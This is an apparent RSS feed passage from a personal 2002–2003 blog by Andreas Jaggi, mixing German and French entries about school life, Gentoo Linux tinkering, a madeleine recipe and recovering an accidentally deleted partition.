  14055.    <creativeCommons:license></creativeCommons:license>
  14056.    <pubDate>Mon, 27 Jan 2003 21:45:00 +0100</pubDate>
  14057.    <category domain="">Tech</category>
  14058.    <description><![CDATA[Ich glaub ich werd mir den Hammer kaufen *g*
  14059. ]]></description>
  14060.    <content:encoded><![CDATA[Ich glaub ich werd mir den Hammer kaufen *g*
  14061. ]]></content:encoded>
  14062.  </item>
  14064.  <item>
  14065.    <title>Still alive</title>
  14066.    <link></link>
  14067.    <guid isPermaLink="true"></guid>
  14068.    <dc:creator>Andreas Jaggi</dc:creator>
  14069.    <creativeCommons:license></creativeCommons:license>
  14070.    <pubDate>Mon, 27 Jan 2003 21:44:00 +0100</pubDate>
  14071.    <category domain="">Misc</category>
  14072.    <description><![CDATA[So, nach dem Begiessen des Notenschlusses (22.1.) und anderen Feierlichkeiten, machten wir heute eine Betreibsbesichtigung bei der Firma <a href=""><b>Moog</b></a>, welche laut Michael S. (dessen Grossvater dat die Firma gegründet) die besten Hochdruckreiniger der Welt herstellt.
  14073. ]]></description>
  14074.    <content:encoded><![CDATA[So, nach dem Begiessen des Notenschlusses (22.1.) und anderen Feierlichkeiten, machten wir heute eine Betreibsbesichtigung bei der Firma <a href=""><b>Moog</b></a>, welche laut Michael S. (dessen Grossvater dat die Firma gegründet) die besten Hochdruckreiniger der Welt herstellt.
  14075. ]]></content:encoded>
  14076.  </item>
  14078.  <item>
  14079.    <title>waimea</title>
  14080.    <link></link>
  14081.    <guid isPermaLink="true"></guid>
  14082.    <dc:creator>Andreas Jaggi</dc:creator>
  14083.    <creativeCommons:license></creativeCommons:license>
  14084.    <pubDate>Tue, 21 Jan 2003 20:30:00 +0100</pubDate>
  14085.    <category domain="">Linux</category>
  14086.    <description><![CDATA[Gerade bei <a href=""><b>mk</b></a> entdeckt: <a href=""><b>waimea</b></a>, ein WindowManager, der mich vor allem mit dem schönen Standard-Hintergrund überrascht hat *g*<br>Er soll auch mit BlackBox-Styles umgehen können und mit Transparenz noch mehr...<br><br><a href=""><b>Screenshot</b></a>
  14087. ]]></description>
  14088.    <content:encoded><![CDATA[Gerade bei <a href=""><b>mk</b></a> entdeckt: <a href=""><b>waimea</b></a>, ein WindowManager, der mich vor allem mit dem schönen Standard-Hintergrund überrascht hat *g*<br>Er soll auch mit BlackBox-Styles umgehen können und mit Transparenz noch mehr...<br><br><a href=""><b>Screenshot</b></a>
  14089. ]]></content:encoded>
  14090.  </item>
  14092.  <item>
  14093.    <title>Tunning</title>
  14094.    <link></link>
  14095.    <guid isPermaLink="true"></guid>
  14096.    <dc:creator>Andreas Jaggi</dc:creator>
  14097.    <creativeCommons:license></creativeCommons:license>
  14098.    <pubDate>Tue, 21 Jan 2003 00:26:00 +0100</pubDate>
  14099.    <category domain="">Linux</category>
  14100.    <description><![CDATA[<a href=""><b>mk</b></a> macht auf seinen Seiten nun eine Sammlung von Tutorials zu Linux und X11. Aber nicht 'normale' Tutorials sondern eher Tunning-Tutorials :-)
  14101. ]]></description>
  14102.    <content:encoded><![CDATA[<a href=""><b>mk</b></a> macht auf seinen Seiten nun eine Sammlung von Tutorials zu Linux und X11. Aber nicht 'normale' Tutorials sondern eher Tunning-Tutorials :-)
  14103. ]]></content:encoded>
  14104.  </item>
  14106.  <item>
  14107.    <title>Spinnerei</title>
  14108.    <link></link>
  14109.    <guid isPermaLink="true"></guid>
  14110.    <dc:creator>Andreas Jaggi</dc:creator>
  14111.    <creativeCommons:license></creativeCommons:license>
  14112.    <pubDate>Tue, 21 Jan 2003 00:23:00 +0100</pubDate>
  14113.    <category domain="">Linux</category>
  14114.    <description><![CDATA[Wer Spass haben will kann unter Linux mal folgendes ausprobieren:<pre>su
  14115. root-passwort
  14116. cat /dev/mouse &gt; /dev/Pfad zum Drucker
  14117. </pre>
  14118. ]]></description>
  14119.    <content:encoded><![CDATA[Wer Spass haben will kann unter Linux mal folgendes ausprobieren:<pre>su
  14120. root-passwort
  14121. cat /dev/mouse &gt; /dev/Pfad zum Drucker
  14122. </pre>
  14123. ]]></content:encoded>
  14124.  </item>
  14126.  <item>
  14127.    <title>Alimentarium</title>
  14128.    <link></link>
  14129.    <guid isPermaLink="true"></guid>
  14130.    <dc:creator>Andreas Jaggi</dc:creator>
  14131.    <creativeCommons:license></creativeCommons:license>
  14132.    <pubDate>Mon, 20 Jan 2003 20:32:00 +0100</pubDate>
  14133.    <category domain="">Food</category>
  14134.    <description><![CDATA[Dimanche on était à <a href=""><b>Vevey</b></a> dans l'<a href=""><b>Alimentarium</b></a>. C'est une musée très intéressant et très recommandable!<br><br>On y pouvait faire des Madeleines avec cette recette:<br><br>Madeleines à l'huile d'olive<br>Selon une recette espagnole<br><br>Pour 9 à 12 moules<br><br>1 oeuf<br>110 g sucre<br>85 g huile d'olive<br>150 g farine<br>1/2 c. à café poudre à lever<br>75 ml de lait<br>1 pincée sel<br><br>Mélanger le sucre, l'oeuf, le sel.<br>Mélanger la poudre à lever avec la farine.<br>Incorporer alternativement le mélange poudre à lever-farine, l'huile, le lait.<br><br>Si on préfère une texture fine, ne pas trop battre la pâte.<br>Au contraire, pour qu'elle forme une belle boule sur le dessus, travailler la pâte au moins 5 min au batteur électrique.<br><br>Graisser les moules au pinceau avec un peu d'huile.<br>Remplir les moules aux trois quarts.<br><br>Cuisson: env. 15 min à 180°C
  14135. ]]></description>
  14136.    <content:encoded><![CDATA[Dimanche on était à <a href=""><b>Vevey</b></a> dans l'<a href=""><b>Alimentarium</b></a>. C'est une musée très intéressant et très recommandable!<br><br>On y pouvait faire des Madeleines avec cette recette:<br><br>Madeleines à l'huile d'olive<br>Selon une recette espagnole<br><br>Pour 9 à 12 moules<br><br>1 oeuf<br>110 g sucre<br>85 g huile d'olive<br>150 g farine<br>1/2 c. à café poudre à lever<br>75 ml de lait<br>1 pincée sel<br><br>Mélanger le sucre, l'oeuf, le sel.<br>Mélanger la poudre à lever avec la farine.<br>Incorporer alternativement le mélange poudre à lever-farine, l'huile, le lait.<br><br>Si on préfère une texture fine, ne pas trop battre la pâte.<br>Au contraire, pour qu'elle forme une belle boule sur le dessus, travailler la pâte au moins 5 min au batteur électrique.<br><br>Graisser les moules au pinceau avec un peu d'huile.<br>Remplir les moules aux trois quarts.<br><br>Cuisson: env. 15 min à 180°C
  14137. ]]></content:encoded>
  14138.  </item>
  14140.  <item>
  14141.    <title>Zeitvertrieb</title>
  14142.    <link></link>
  14143.    <guid isPermaLink="true"></guid>
  14144.    <dc:creator>Andreas Jaggi</dc:creator>
  14145.    <creativeCommons:license></creativeCommons:license>
  14146.    <pubDate>Sat, 18 Jan 2003 14:39:00 +0100</pubDate>
  14147.    <category domain="">Misc</category>
  14148.    <description><![CDATA[So. Am Donnerstag war ich am Infotag der <a href=""><b>Uni Bern</b></a>. Dieser war jedoch nicht so überzeugend wie der der <a href=""><b>ETH Zürich</b></a>. So langsam bekomme ich das Gefühl, dass dieses Studieren doch nix für mich ist.<br><br>Am Abend dann noch in Bern Lord of the Rings II angeschaut, zum zweiten Mal, aber auf Englisch, was definitiv besser ist.<br><br>Nach einer kurzen Nacht dann am Freitag in der Schule so richtig ausgehängt :-)<br><br>Als ich nach dem Befeiern des 9. Tages Schule im neuen Jahr endlich nach Hause gefunden hatte und den Computer startete, ertönte ein mir unbekanntes Geräusch. Es klang, als würde ein Lüfter irgendwie falsch drehen, d.h. irgend eine anderes Teil abreiben. Ich lokaliseirte das Problem vermutlich beim Netzteil. Also schnell den Computer ausgeschaltet, Netzteil ausgebaut. Vorsichtig das Netzteil augeschraubt und dort die Lüfter ausgebaut (Ja, ich lebe noch ;-), mit dem Staubsauger ein bisschen den Dreck weggemacht, etwas an den Lüfter rumgedrückt, wieder alles zusammengebaut und den Computer eingeschaltet. Et voilà, der Computer läuft wieder mit der mir bekannten Dezibellzahl ;-)
  14149. ]]></description>
  14150.    <content:encoded><![CDATA[So. Am Donnerstag war ich am Infotag der <a href=""><b>Uni Bern</b></a>. Dieser war jedoch nicht so überzeugend wie der der <a href=""><b>ETH Zürich</b></a>. So langsam bekomme ich das Gefühl, dass dieses Studieren doch nix für mich ist.<br><br>Am Abend dann noch in Bern Lord of the Rings II angeschaut, zum zweiten Mal, aber auf Englisch, was definitiv besser ist.<br><br>Nach einer kurzen Nacht dann am Freitag in der Schule so richtig ausgehängt :-)<br><br>Als ich nach dem Befeiern des 9. Tages Schule im neuen Jahr endlich nach Hause gefunden hatte und den Computer startete, ertönte ein mir unbekanntes Geräusch. Es klang, als würde ein Lüfter irgendwie falsch drehen, d.h. irgend eine anderes Teil abreiben. Ich lokaliseirte das Problem vermutlich beim Netzteil. Also schnell den Computer ausgeschaltet, Netzteil ausgebaut. Vorsichtig das Netzteil augeschraubt und dort die Lüfter ausgebaut (Ja, ich lebe noch ;-), mit dem Staubsauger ein bisschen den Dreck weggemacht, etwas an den Lüfter rumgedrückt, wieder alles zusammengebaut und den Computer eingeschaltet. Et voilà, der Computer läuft wieder mit der mir bekannten Dezibellzahl ;-)
  14151. ]]></content:encoded>
  14152.  </item>
  14154.  <item>
  14155.    <title>mmm</title>
  14156.    <link></link>
  14157.    <guid isPermaLink="true"></guid>
  14158.    <dc:creator>Andreas Jaggi</dc:creator>
  14159.    <creativeCommons:license></creativeCommons:license>
  14160.    <pubDate>Mon, 13 Jan 2003 20:53:00 +0100</pubDate>
  14161.    <category domain="">Misc</category>
  14162.    <description><![CDATA[unter <a href=""><b>milko music machine</b></a> kann man mal so richtig die puppen tanzen lassen *g*<br><br>ja, ich weiss schon, sind kühe, aber puppen passte besser in den satz ;-)
  14163. ]]></description>
  14164.    <content:encoded><![CDATA[unter <a href=""><b>milko music machine</b></a> kann man mal so richtig die puppen tanzen lassen *g*<br><br>ja, ich weiss schon, sind kühe, aber puppen passte besser in den satz ;-)
  14165. ]]></content:encoded>
  14166.  </item>
  14168.  <item>
  14169.    <title>MPlayer</title>
  14170.    <link></link>
  14171.    <guid isPermaLink="true"></guid>
  14172.    <dc:creator>Andreas Jaggi</dc:creator>
  14173.    <creativeCommons:license></creativeCommons:license>
  14174.    <pubDate>Mon, 13 Jan 2003 20:13:00 +0100</pubDate>
  14175.    <category domain="">Linux</category>
  14176.    <description><![CDATA[Nein, nicht MPlayer wie mplayer.exe !!!<br><br>Sondern <a href=""><b>MPlayer</b></a>. Wie vielerorts gesagt, kann auch ich mich daran anschliessen: geiles Tool ;-)<br><br>MPlayer mit aalib (daher die vielen Buchstaben ;-) : <a href=""><b>Screenshot</b></a>
  14177. ]]></description>
  14178.    <content:encoded><![CDATA[Nein, nicht MPlayer wie mplayer.exe !!!<br><br>Sondern <a href=""><b>MPlayer</b></a>. Wie vielerorts gesagt, kann auch ich mich daran anschliessen: geiles Tool ;-)<br><br>MPlayer mit aalib (daher die vielen Buchstaben ;-) : <a href=""><b>Screenshot</b></a>
  14179. ]]></content:encoded>
  14180.  </item>
  14182.  <item>
  14183.    <title>Welcome to Danemark!</title>
  14184.    <link></link>
  14185.    <guid isPermaLink="true"></guid>
  14186.    <dc:creator>Andreas Jaggi</dc:creator>
  14187.    <creativeCommons:license></creativeCommons:license>
  14188.    <pubDate>Sun, 12 Jan 2003 05:36:00 +0100</pubDate>
  14189.    <category domain="">Misc</category>
  14190.    <description><![CDATA[Via <a href="" title=" ("><b>pzy</b></a> einen <a href=""><b>Link</b></a> gefunden, welcher evtl. bei einigen Personen unserer Klasse, die Lust auf die Maturreise nach Dänemark steigert ;-)
  14191. ]]></description>
  14192.    <content:encoded><![CDATA[Via <a href="" title=" ("><b>pzy</b></a> einen <a href=""><b>Link</b></a> gefunden, welcher evtl. bei einigen Personen unserer Klasse, die Lust auf die Maturreise nach Dänemark steigert ;-)
  14193. ]]></content:encoded>
  14194.  </item>
  14196.  <item>
  14197.    <title>The Hacker FAQ</title>
  14198.    <link></link>
  14199.    <guid isPermaLink="true"></guid>
  14200.    <dc:creator>Andreas Jaggi</dc:creator>
  14201.    <creativeCommons:license></creativeCommons:license>
  14202.    <pubDate>Sat, 11 Jan 2003 22:58:00 +0100</pubDate>
  14203.    <category domain="">Misc</category>
  14204.    <description><![CDATA[<a href=""><b>The Hacker FAQ</b></a>, gefunden bei <a href=""><b>kasia</b></a>.<br><br>Und nein, es ist nicht das was ihr denkt ;-)
  14205. ]]></description>
  14206.    <content:encoded><![CDATA[<a href=""><b>The Hacker FAQ</b></a>, gefunden bei <a href=""><b>kasia</b></a>.<br><br>Und nein, es ist nicht das was ihr denkt ;-)
  14207. ]]></content:encoded>
  14208.  </item>
  14210.  <item>
  14211.    <title>Es druckt!</title>
  14212.    <link></link>
  14213.    <guid isPermaLink="true"></guid>
  14214.    <dc:creator>Andreas Jaggi</dc:creator>
  14215.    <creativeCommons:license></creativeCommons:license>
  14216.    <pubDate>Sat, 11 Jan 2003 22:41:00 +0100</pubDate>
  14217.    <category domain="">Linux</category>
  14218.    <description><![CDATA[Mit Hilfe von <a href=""><b>diesem Tutorial</b></a> habe ich nun mein <a href=""><b>Gentoo</b></a> so eingerichtet, dass es mit meinem HP PSC 950 zusammen drucken kann.
  14219. ]]></description>
  14220.    <content:encoded><![CDATA[Mit Hilfe von <a href=""><b>diesem Tutorial</b></a> habe ich nun mein <a href=""><b>Gentoo</b></a> so eingerichtet, dass es mit meinem HP PSC 950 zusammen drucken kann.
  14221. ]]></content:encoded>
  14222.  </item>
  14224.  <item>
  14225.    <title>*schnarch*</title>
  14226.    <link></link>
  14227.    <guid isPermaLink="true"></guid>
  14228.    <dc:creator>Andreas Jaggi</dc:creator>
  14229.    <creativeCommons:license></creativeCommons:license>
  14230.    <pubDate>Sat, 11 Jan 2003 21:07:00 +0100</pubDate>
  14231.    <category domain="">Misc</category>
  14232.    <description><![CDATA[So, heute mal wieder bis 16:30 Uhr geschlafen ...
  14233. ]]></description>
  14234.    <content:encoded><![CDATA[So, heute mal wieder bis 16:30 Uhr geschlafen ...
  14235. ]]></content:encoded>
  14236.  </item>
  14238.  <item>
  14239.    <title>humelela</title>
  14240.    <link></link>
  14241.    <guid isPermaLink="true"></guid>
  14242.    <dc:creator>Andreas Jaggi</dc:creator>
  14243.    <creativeCommons:license></creativeCommons:license>
  14244.    <pubDate>Thu, 09 Jan 2003 22:18:00 +0100</pubDate>
  14245.    <category domain="">Misc</category>
  14246.    <description><![CDATA[Ce mot correspond &#224; "regarde vers l'avant". <br>Aujourd'hui en histoire bilingue il y avait un exposé contenant un chanson de l'Afrique de sud qui traite l'inégalité des femmes en Afrique, je pense que son title était ceci:<br><br>mamani humelela<br> <br>qui veut dire: maman, regarde vers l'avant.
  14247. ]]></description>
  14248.    <content:encoded><![CDATA[Ce mot correspond &#224; "regarde vers l'avant". <br>Aujourd'hui en histoire bilingue il y avait un exposé contenant un chanson de l'Afrique de sud qui traite l'inégalité des femmes en Afrique, je pense que son title était ceci:<br><br>mamani humelela<br> <br>qui veut dire: maman, regarde vers l'avant.
  14249. ]]></content:encoded>
  14250.  </item>
  14252.  <item>
  14253.    <title>Schnell</title>
  14254.    <link></link>
  14255.    <guid isPermaLink="true"></guid>
  14256.    <dc:creator>Andreas Jaggi</dc:creator>
  14257.    <creativeCommons:license></creativeCommons:license>
  14258.    <pubDate>Wed, 08 Jan 2003 22:22:00 +0100</pubDate>
  14259.    <category domain="">Linux</category>
  14260.    <description><![CDATA[Jetz hab ich doch erst <a href=""><b>vorhin</b></a> das ganze System aktualisiert, inklusive PHP (von 4.2.3 auf 4.3.0-r1). Und nun schaue ich wieder und es sind schon wieder fast 10 Updates verfügbar (z.B. PHP 4.3.0-r2). Manchmal ist mir <a href=""><b>Gentoo</b></a> doch ein bisschen zu schnell ;-)
  14261. ]]></description>
  14262.    <content:encoded><![CDATA[Jetz hab ich doch erst <a href=""><b>vorhin</b></a> das ganze System aktualisiert, inklusive PHP (von 4.2.3 auf 4.3.0-r1). Und nun schaue ich wieder und es sind schon wieder fast 10 Updates verfügbar (z.B. PHP 4.3.0-r2). Manchmal ist mir <a href=""><b>Gentoo</b></a> doch ein bisschen zu schnell ;-)
  14263. ]]></content:encoded>
  14264.  </item>
  14266.  <item>
  14267.    <title>Rundumerneuern</title>
  14268.    <link></link>
  14269.    <guid isPermaLink="true"></guid>
  14270.    <dc:creator>Andreas Jaggi</dc:creator>
  14271.    <creativeCommons:license></creativeCommons:license>
  14272.    <pubDate>Wed, 08 Jan 2003 16:48:00 +0100</pubDate>
  14273.    <category domain="">Linux</category>
  14274.    <description><![CDATA[Auf <a href=""><b>diesem Screenshot</b></a> sieht man wie mittels <pre>emerge -u world</pre> die installierten Programme aktualisiert werden.<br><br>Das Theme für <a href=""><b>fluxbox</b></a> nennt sich <b>SLdr</b> und stammt von <a href=""><b>mk</b></a>. Den Hintergrund kann man <a href=""><b>hier</b></a> finden.
  14275. ]]></description>
  14276.    <content:encoded><![CDATA[Auf <a href=""><b>diesem Screenshot</b></a> sieht man wie mittels <pre>emerge -u world</pre> die installierten Programme aktualisiert werden.<br><br>Das Theme für <a href=""><b>fluxbox</b></a> nennt sich <b>SLdr</b> und stammt von <a href=""><b>mk</b></a>. Den Hintergrund kann man <a href=""><b>hier</b></a> finden.
  14277. ]]></content:encoded>
  14278.  </item>
  14280.  <item>
  14281.    <title>Am Umsteigen</title>
  14282.    <link></link>
  14283.    <guid isPermaLink="true"></guid>
  14284.    <dc:creator>Andreas Jaggi</dc:creator>
  14285.    <creativeCommons:license></creativeCommons:license>
  14286.    <pubDate>Wed, 08 Jan 2003 16:29:00 +0100</pubDate>
  14287.    <category domain="">Linux</category>
  14288.    <description><![CDATA[Ich hab grad 'E: (Games)' plattgemacht und mit <pre>mke2fs -j /dev/hda6</pre> und diesem Eintrag in /etc/fstab <pre>/dev/hda6 /usr/local/games ext3 noatime,user 0 0</pre> wiederbelebt ;-)
  14289. ]]></description>
  14290.    <content:encoded><![CDATA[Ich hab grad 'E: (Games)' plattgemacht und mit <pre>mke2fs -j /dev/hda6</pre> und diesem Eintrag in /etc/fstab <pre>/dev/hda6 /usr/local/games ext3 noatime,user 0 0</pre> wiederbelebt ;-)
  14291. ]]></content:encoded>
  14292.  </item>
  14294.  <item>
  14295.    <title>Eisig</title>
  14296.    <link></link>
  14297.    <guid isPermaLink="true"></guid>
  14298.    <dc:creator>Andreas Jaggi</dc:creator>
  14299.    <creativeCommons:license></creativeCommons:license>
  14300.    <pubDate>Tue, 07 Jan 2003 16:57:00 +0100</pubDate>
  14301.    <category domain="">Misc</category>
  14302.    <description><![CDATA[Als ich heute Morgen um 10 vor 6 frischgeduscht zum Bahnhof rannte, musste ich feststellen, dass meine noch nicht ganz getrockneten Haare gefrohren waren!
  14303. ]]></description>
  14304.    <content:encoded><![CDATA[Als ich heute Morgen um 10 vor 6 frischgeduscht zum Bahnhof rannte, musste ich feststellen, dass meine noch nicht ganz getrockneten Haare gefrohren waren!
  14305. ]]></content:encoded>
  14306.  </item>
  14308.  <item>
  14309.    <title>LingoFox (r)</title>
  14310.    <link></link>
  14311.    <guid isPermaLink="true"></guid>
  14312.    <dc:creator>Andreas Jaggi</dc:creator>
  14313.    <creativeCommons:license></creativeCommons:license>
  14314.    <pubDate>Mon, 06 Jan 2003 22:23:00 +0100</pubDate>
  14315.    <category domain="">School</category>
  14316.    <description><![CDATA[<a href=""><b>Michael</b></a> hat eine evtl. sehr hilfreiche Website gefunden: <a href=""><b>Verben konjugieren mit LingoFox dem Konjugator</b></a><br><br>Leider darf man während den Franz.-Proben nicht ins Internet *g*
  14317. ]]></description>
  14318.    <content:encoded><![CDATA[<a href=""><b>Michael</b></a> hat eine evtl. sehr hilfreiche Website gefunden: <a href=""><b>Verben konjugieren mit LingoFox dem Konjugator</b></a><br><br>Leider darf man während den Franz.-Proben nicht ins Internet *g*
  14319. ]]></content:encoded>
  14320.  </item>
  14322.  <item>
  14323.    <title>Schlaf?</title>
  14324.    <link></link>
  14325.    <guid isPermaLink="true"></guid>
  14326.    <dc:creator>Andreas Jaggi</dc:creator>
  14327.    <creativeCommons:license></creativeCommons:license>
  14328.    <pubDate>Mon, 06 Jan 2003 00:27:00 +0100</pubDate>
  14329.    <category domain="">Misc</category>
  14330.    <description><![CDATA[Heute hab ich von etwa 01:30 bis 16 Uhr geschlafen, 15.5 Stunden! Das ist neuer Rekord! ;-)
  14331. ]]></description>
  14332.    <content:encoded><![CDATA[Heute hab ich von etwa 01:30 bis 16 Uhr geschlafen, 15.5 Stunden! Das ist neuer Rekord! ;-)
  14333. ]]></content:encoded>
  14334.  </item>
  14336.  <item>
  14337.    <title>Es ist wieder soweit</title>
  14338.    <link></link>
  14339.    <guid isPermaLink="true"></guid>
  14340.    <dc:creator>Andreas Jaggi</dc:creator>
  14341.    <creativeCommons:license></creativeCommons:license>
  14342.    <pubDate>Wed, 01 Jan 2003 13:43:00 +0100</pubDate>
  14343.    <category domain="">Linux</category>
  14344.    <description><![CDATA[Mein Gentoo ist wieder einmal neu kompiliert. Diesmal hab ich mir die Zeit genomen und <a href=""><b>dieses Tutorial</b></a> über XFree86 ganz durchgelesen. Daher weiss ich nun, wie man den Windowmanager einstellt. Vermutlich kommt es auch daher, dass ich GNOME noch nie gestartet habe sondern die ganze Zeit mit <a href=""><b>Fluxbox</b></a> arbeitet ;-)<br><br><a href=""><b>Einen Screenshot</b></a> gibt's natürlich auch.
  14345. ]]></description>
  14346.    <content:encoded><![CDATA[Mein Gentoo ist wieder einmal neu kompiliert. Diesmal hab ich mir die Zeit genomen und <a href=""><b>dieses Tutorial</b></a> über XFree86 ganz durchgelesen. Daher weiss ich nun, wie man den Windowmanager einstellt. Vermutlich kommt es auch daher, dass ich GNOME noch nie gestartet habe sondern die ganze Zeit mit <a href=""><b>Fluxbox</b></a> arbeitet ;-)<br><br><a href=""><b>Einen Screenshot</b></a> gibt's natürlich auch.
  14347. ]]></content:encoded>
  14348.  </item>
  14350.  <item>
  14351.    <title>2k3</title>
  14352.    <link></link>
  14353.    <guid isPermaLink="true"></guid>
  14354.    <dc:creator>Andreas Jaggi</dc:creator>
  14355.    <creativeCommons:license></creativeCommons:license>
  14356.    <pubDate>Tue, 31 Dec 2002 23:59:01 +0100</pubDate>
  14357.    <category domain="">Misc</category>
  14358.    <description><![CDATA[Bonne année!
  14359. ]]></description>
  14360.    <content:encoded><![CDATA[Bonne année!
  14361. ]]></content:encoded>
  14362.  </item>
  14364.  <item>
  14365.    <title>2k3 (wie beim UT ;-)</title>
  14366.    <link></link>
  14367.    <guid isPermaLink="true"></guid>
  14368.    <dc:creator>Andreas Jaggi</dc:creator>
  14369.    <creativeCommons:license></creativeCommons:license>
  14370.    <pubDate>Tue, 31 Dec 2002 23:59:00 +0100</pubDate>
  14371.    <category domain="">Misc</category>
  14372.    <description><![CDATA[Frohes Neues Jahr!<br>Das mit den Vorsätzen lassen wir jetzt mal ;-)
  14373. ]]></description>
  14374.    <content:encoded><![CDATA[Frohes Neues Jahr!<br>Das mit den Vorsätzen lassen wir jetzt mal ;-)
  14375. ]]></content:encoded>
  14376.  </item>
  14378.  <item>
  14379.    <title>Phiki Wiki pour tous</title>
  14380.    <link></link>
  14381.    <guid isPermaLink="true"></guid>
  14382.    <dc:creator>Andreas Jaggi</dc:creator>
  14383.    <creativeCommons:license></creativeCommons:license>
  14384.    <pubDate>Mon, 30 Dec 2002 00:55:00 +0100</pubDate>
  14385.    <category domain="">Misc</category>
  14386.    <description><![CDATA[Sur <a href=""><b></b></a> vous pouvez écrire, créer, jouer, bavarder, politiser, publier ...<br><br>Faites-le! ;-)
  14387. ]]></description>
  14388.    <content:encoded><![CDATA[Sur <a href=""><b></b></a> vous pouvez écrire, créer, jouer, bavarder, politiser, publier ...<br><br>Faites-le! ;-)
  14389. ]]></content:encoded>
  14390.  </item>
  14392.  <item>
  14393.    <title>Spielwiese</title>
  14394.    <link></link>
  14395.    <guid isPermaLink="true"></guid>
  14396.    <dc:creator>Andreas Jaggi</dc:creator>
  14397.    <creativeCommons:license></creativeCommons:license>
  14398.    <pubDate>Mon, 30 Dec 2002 00:50:00 +0100</pubDate>
  14399.    <category domain="">Misc</category>
  14400.    <description><![CDATA[Wer das Bedürfnis hat, der Welt etwas mitzuteilen, kreativ zu sein, Kommunikation zu betreiben, zu spielen, literarische Kunstwerke zu veröffentlichen, das Internet mitzugestalten, seine Meinung zu publizieren, Politik zu machen wollen oder sich einfach mit einem Wiki auszutoben, der hat nun <a href=""><b>hier</b></a> die Möglichkeit dazu. ;-)<br><br>Auf <a href=""><b></b></a> dürft ihr eurer Fantasie freien Lauf lassen, damit auch Leute die Gelegenheit haben, etwas 'ins Internet zu stellen', die kein Weblog und keine Homepage haben. Also: Schreibt!
  14401. ]]></description>
  14402.    <content:encoded><![CDATA[Wer das Bedürfnis hat, der Welt etwas mitzuteilen, kreativ zu sein, Kommunikation zu betreiben, zu spielen, literarische Kunstwerke zu veröffentlichen, das Internet mitzugestalten, seine Meinung zu publizieren, Politik zu machen wollen oder sich einfach mit einem Wiki auszutoben, der hat nun <a href=""><b>hier</b></a> die Möglichkeit dazu. ;-)<br><br>Auf <a href=""><b></b></a> dürft ihr eurer Fantasie freien Lauf lassen, damit auch Leute die Gelegenheit haben, etwas 'ins Internet zu stellen', die kein Weblog und keine Homepage haben. Also: Schreibt!
  14403. ]]></content:encoded>
  14404.  </item>
  14406.  <item>
  14407.    <title>Nacht des Schreckens</title>
  14408.    <link></link>
  14409.    <guid isPermaLink="true"></guid>
  14410.    <dc:creator>Andreas Jaggi</dc:creator>
  14411.    <creativeCommons:license></creativeCommons:license>
  14412.    <pubDate>Sat, 28 Dec 2002 14:16:00 +0100</pubDate>
  14413.    <category domain="">Tech</category>
  14414.    <description><![CDATA[Gestern Abend, beim Linuxneuaufsetzen, als ich mit cfdisk herumgewerkelt habe, hatte ich wohl eine ganz schwache Sekunde: ich habe die $HOME-Partition gelöscht und die Partitionstabelle gespeichert!
  14415. <br>Als ich es ein paar Minuten später realisierte, bin ich verständlicherweise fast vom Stuhl gefallen. Also: Computer sofort abstellen, damit die Chancen möglichst gross bleiben, ein paar Daten wiederherzustellen. Dann neu booten mit Partiton-Magic  und mit 'Wiederherstellen' herumüben. Aber das blieb ohne Erfolg, Partition-Magic wollte von der Partition nichts gesehen haben. Also nochmal Computer ausschalten. Mit dem Zweitcomputer im Internet nach 'Datenrettung fat-partition gelöscht' suchen und ein paar Seiten zum Thema finden. (<a href=""><b>Artikel zum Thema</b></a>, <a href=""><b></b></a>, <a href=""><b></b></a>). Schliesslich finde ich <a href=""><b>dieses Tool</b></a>. Nun bei meinem Computer die HDs so umhängen, dass die alte IBM-Platte bootet (hat glücklicherweise noch ein W2K drauf). Hätte nicht gedacht, dass ich die nocheinmal benutzen würde. Also, das Tool draufgetan und mit der alten Platte geboote, die zu bearbeitende als Slave angehängt. Mit dem Tool die Festplatte nach Partitionen und Ordnern und sonstigen Daten abgesucht, bit für bit nehme ich an (jedenfalls hat es so lange gedauert ;-)
  14416. <br>Zu meinem erfreulichen Erstaunen hat es sogar etwas gefunden: 36 Partitionen, von insgesamt 15 die auf der Platte sind und 4 die im durchsuchten Bereich liegen. Beim anschauen der gefundenen Daten durfte ich feststellen, dass noch alle Daten erhalten waren. Die 36 Partitionen kamen vermutlich weil ich einen Ordner mit ISO-Images verschiedener Unix-Distributionen hatte. Nun begann ich die Daten auf die alte Festplatte zu speichern, wozu ich dort fast alle Programme löschen musste, um Platz zu schaffen *g*
  14417. <br>Nachdem diese langwierige Prozedur abgeschlossen war Rechner herunterfahren. Die HDs wieder neu umhängen, so das wieder meine Platte am Master
  14418. hängt. Mit der Gentoo-Live-CD booten und mittels cfdisk die Partition neu erstellen und den Typ wieder auf Fat32 setzen. Neu booten und erfreut feststellen, dass der MBR mit einem GRUB gefüllt ist, das noch nicht vollständig installiert ist, da ich ja die Linuxinstallation abgebrochen habe. Also erneutes Suchen im Web. Beim SUSE-SUpport wurde ich schliesslich fündig: W2K-Installations-Disk einlegen und neu booten, dann R für reparieren und dann K für Wiederherstellungskonsole, W2K-Partition auswählen und Admin-Passwort eingeben. Dann mittels fixmbr den MBR wiederherstellen und mit exit neu booten. Windows aufstarten lassen. Einloggen. Arbeitsplatz öffnen, um die geretteten Dateien von der alten HD zurückzukopieren. Zu meine grossen Erstaunen, finde ist die neu erstellte Partition schon so beschriftet, wie die alte war! Ein Doppelklick darauf bringt erstaunlicherwese den Inhalt der alten Partition zum Vorschein, es ist alles noch da! Windows hat also gar nicht bemerkt, dass die Partition eigentlich neu ist und hat einfach die alten Daten zugeordnet! So habe ich dann das zurückkopieren der geretteten Daten bleiben lassen. Den Computer heruntergefahren und die alte HD wieder ausgebaut. Noch ein letzter Start von Windows, alle Daten sind noch da, und dann ab ins Bett, um <u>7 Uhr Morgens !!!</u>
  14419. <br><br>Wenn ihr also mal eine Nacht nicht schlafen wollt, könnt ihr ja eure $HOME-Partition löschen, da bleibt die Spannung bis zum Schluss erhalten, garantiert! ;-)
  14420. ]]></description>
  14421.    <content:encoded><![CDATA[Gestern Abend, beim Linuxneuaufsetzen, als ich mit cfdisk herumgewerkelt habe, hatte ich wohl eine ganz schwache Sekunde: ich habe die $HOME-Partition gelöscht und die Partitionstabelle gespeichert!
